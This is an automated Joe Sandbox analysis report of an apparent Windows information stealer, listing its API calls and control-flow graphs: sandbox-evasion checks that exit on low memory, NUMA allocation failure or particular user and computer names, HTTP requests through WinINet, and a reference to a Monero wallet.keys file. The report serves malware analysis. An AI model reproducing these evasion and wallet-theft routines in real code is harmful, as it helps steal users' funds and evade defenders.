                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$
                                • API String ID: 1544550907-1928815233
                                • Opcode ID: ece935215d299190ef4fd90a763c50f98e59e3dc584f9b7820da9551b5346b98
                                • Instruction ID: 56a6533f98e7cee51110eb0b6ccc1866a195ce31a0948bf01b9de5b316ca4e85
                                • Opcode Fuzzy Hash: ece935215d299190ef4fd90a763c50f98e59e3dc584f9b7820da9551b5346b98
                                • Instruction Fuzzy Hash: 144191B1D04248ABDF10DF94DC49FEEBBB8EF08704F104199F509A7281DB74AA44DBA5

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D017D0), ref: 000998A1
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01650), ref: 000998BA
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01770), ref: 000998D2
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D015A8), ref: 000998EA
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D016F8), ref: 00099903
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D08AF0), ref: 0009991B
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00CF4FD0), ref: 00099933
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00CF5110), ref: 0009994C
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01788), ref: 00099964
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01698), ref: 0009997C
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D01740), ref: 00099995
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D016C8), ref: 000999AD
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00CF4F90), ref: 000999C5
                                  • Part of subcall function 00099860: GetProcAddress.KERNEL32(77190000,00D016B0), ref: 000999DE
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 000811D0: ExitProcess.KERNEL32 ref: 00081211
                                  • Part of subcall function 00081160: GetSystemInfo.KERNEL32(?), ref: 0008116A
                                  • Part of subcall function 00081160: ExitProcess.KERNEL32 ref: 0008117E
                                  • Part of subcall function 00081110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0008112B
                                  • Part of subcall function 00081110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00081132
                                  • Part of subcall function 00081110: ExitProcess.KERNEL32 ref: 00081143
                                  • Part of subcall function 00081220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0008123E
                                  • Part of subcall function 00081220: __aulldiv.LIBCMT ref: 00081258
                                  • Part of subcall function 00081220: __aulldiv.LIBCMT ref: 00081266
                                  • Part of subcall function 00081220: ExitProcess.KERNEL32 ref: 00081294
                                  • Part of subcall function 00096770: GetUserDefaultLangID.KERNEL32 ref: 00096774
                                  • Part of subcall function 00081190: ExitProcess.KERNEL32 ref: 000811C6
                                  • Part of subcall function 00097850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                  • Part of subcall function 00097850: RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                  • Part of subcall function 00097850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                  • Part of subcall function 000978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                  • Part of subcall function 000978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                  • Part of subcall function 000978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D08AC0,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00096AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00096AF9
                                • Sleep.KERNEL32(00001770), ref: 00096B04
                                • CloseHandle.KERNEL32(?,00000000,?,00D08AC0,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096B1A
                                • ExitProcess.KERNEL32 ref: 00096B22
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: f7a1100e60edbb3da0bbb16542ef5e8a3e8e29d1342a7ad7be186a933c03bb94
                                • Instruction ID: 2b41a55a420a45435638e155a4bd9aa06a691f7c077b3d5e65278f6cb2bf867a
                                • Opcode Fuzzy Hash: f7a1100e60edbb3da0bbb16542ef5e8a3e8e29d1342a7ad7be186a933c03bb94
                                • Instruction Fuzzy Hash: 8D31EA71A50208AADF04FBF0EC5ABEEB778BF15740F104518F212A6193DF716905EBA6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 81220-81247 call 989b0 GlobalMemoryStatusEx 1439 81249-81271 call 9da00 * 2 1436->1439 1440 81273-8127a 1436->1440 1441 81281-81285 1439->1441 1440->1441 1443 8129a-8129d 1441->1443 1444 81287 1441->1444 1446 81289-81290 1444->1446 1447 81292-81294 ExitProcess 1444->1447 1446->1443 1446->1447
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0008123E
                                • __aulldiv.LIBCMT ref: 00081258
                                • __aulldiv.LIBCMT ref: 00081266
                                • ExitProcess.KERNEL32 ref: 00081294
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 9ab9ef9c1be22f0fd1fb0bbbac7ca8c9d991c6bff6abec0a1bba09b396130bd4
                                • Instruction ID: e003f515d5a38b9f1972656083cfc934a261137a834f630560b5ed00df5f5e9b
                                • Opcode Fuzzy Hash: 9ab9ef9c1be22f0fd1fb0bbbac7ca8c9d991c6bff6abec0a1bba09b396130bd4
                                • Instruction Fuzzy Hash: BB014BB0940308AAEF10EBE0DC4AFDEBBB8BF04705F208049E605B62C1D67455568799

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 96af3 1451 96b0a 1450->1451 1453 96aba-96ad7 call 9aad0 OpenEventA 1451->1453 1454 96b0c-96b22 call 96920 call 95b10 CloseHandle ExitProcess 1451->1454 1459 96ad9-96af1 call 9aad0 CreateEventA 1453->1459 1460 96af5-96b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D08AC0,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00096AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00096AF9
                                • Sleep.KERNEL32(00001770), ref: 00096B04
                                • CloseHandle.KERNEL32(?,00000000,?,00D08AC0,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096B1A
                                • ExitProcess.KERNEL32 ref: 00096B22
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 83a074dc99b91b022755e831056145b6c648e76b93a642c276cf680f1330514f
                                • Instruction ID: 8e6ff322a79a44aee732aef5a931523b1c9842281e0e7d7e483b3c55266c8cf8
                                • Opcode Fuzzy Hash: 83a074dc99b91b022755e831056145b6c648e76b93a642c276cf680f1330514f
                                • Instruction Fuzzy Hash: 3BF05E70A44209ABEF10ABA0EC1ABBE7B74FB04745F104514B512A11C2DBB25540FA97

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 1ae22f97f5794732c0cbd55a36e6fb201b06674e83cc4dd24c9db1240512372a
                                • Instruction ID: f5ba20ac16e16b59c90abc31b94d7cc3198f3c25062ca6c02a3ba739de2bc771
                                • Opcode Fuzzy Hash: 1ae22f97f5794732c0cbd55a36e6fb201b06674e83cc4dd24c9db1240512372a
                                • Instruction Fuzzy Hash: 3D212F71D00208ABDF14EFA4E94AADD7B74FB45310F108225E515A72C1DB706609DB91

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 00086280: InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                  • Part of subcall function 00086280: StrCmpCA.SHLWAPI(?,00D0F398), ref: 00086303
                                  • Part of subcall function 00086280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                  • Part of subcall function 00086280: HttpOpenRequestA.WININET(00000000,GET,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00086385
                                  • Part of subcall function 00086280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                  • Part of subcall function 00086280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095228
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: afaa01846a564d7f5c46fc31297620feb6b0e9d8ff43d21689d80520259d924e
                                • Instruction ID: 76e121dc5425604fe00f2fa5ebc5cabc0ea154c32812741bcf76bfd684cc83e5
                                • Opcode Fuzzy Hash: afaa01846a564d7f5c46fc31297620feb6b0e9d8ff43d21689d80520259d924e
                                • Instruction Fuzzy Hash: 7911EC30A10548ABCF14FFA4DD52AED7378AF51340F404168F91A5A593EF70AB0AE7D2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: c72957d4c71c0338fa65cb33da775f6f6d6934abbe7b4bb05429ae7188211f02
                                • Instruction ID: baa3f63b23dc38181db5b74ebc341b919c036db1a778509a126945ffe7204b72
                                • Opcode Fuzzy Hash: c72957d4c71c0338fa65cb33da775f6f6d6934abbe7b4bb05429ae7188211f02
                                • Instruction Fuzzy Hash: 6A01A9B1A44208EFDB10DF94DD49FAEBBF8F704B15F10421AF645E3280C37459008BA1
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0008112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00081132
                                • ExitProcess.KERNEL32 ref: 00081143
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: e86ad2344097af7dbbcc7aaecae2fa82eb3ee2dac90205f9c37d241d14b668b9
                                • Instruction ID: a47a99a9f603b438b4e32d1a064a6a65cffab5828dcf2b3c2e045da3c7da6f23
                                • Opcode Fuzzy Hash: e86ad2344097af7dbbcc7aaecae2fa82eb3ee2dac90205f9c37d241d14b668b9
                                • Instruction Fuzzy Hash: 2CE0E67098530CFBE7506BA0AC0EF4D76BCBF04B05F104154F709761D0D6B52A419B99
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000810B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000810F7
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 4be79213e06cbb8912737c47ca2827ce441d176e441a5e1e3777b3f0415a02bd
                                • Instruction ID: f62d1edb28f9359dc8e6204123d76ed47eb8a4eda47d5d6347a24f6fe8c715dd
                                • Opcode Fuzzy Hash: 4be79213e06cbb8912737c47ca2827ce441d176e441a5e1e3777b3f0415a02bd
                                • Instruction Fuzzy Hash: 4BF0E271641208BBEB14ABA8AC4DFEEB7ECE705B15F300548F544E3280D5729E00DBA0
                                APIs
                                  • Part of subcall function 000978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                  • Part of subcall function 000978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                  • Part of subcall function 000978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                  • Part of subcall function 00097850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                  • Part of subcall function 00097850: RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                  • Part of subcall function 00097850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                • ExitProcess.KERNEL32 ref: 000811C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
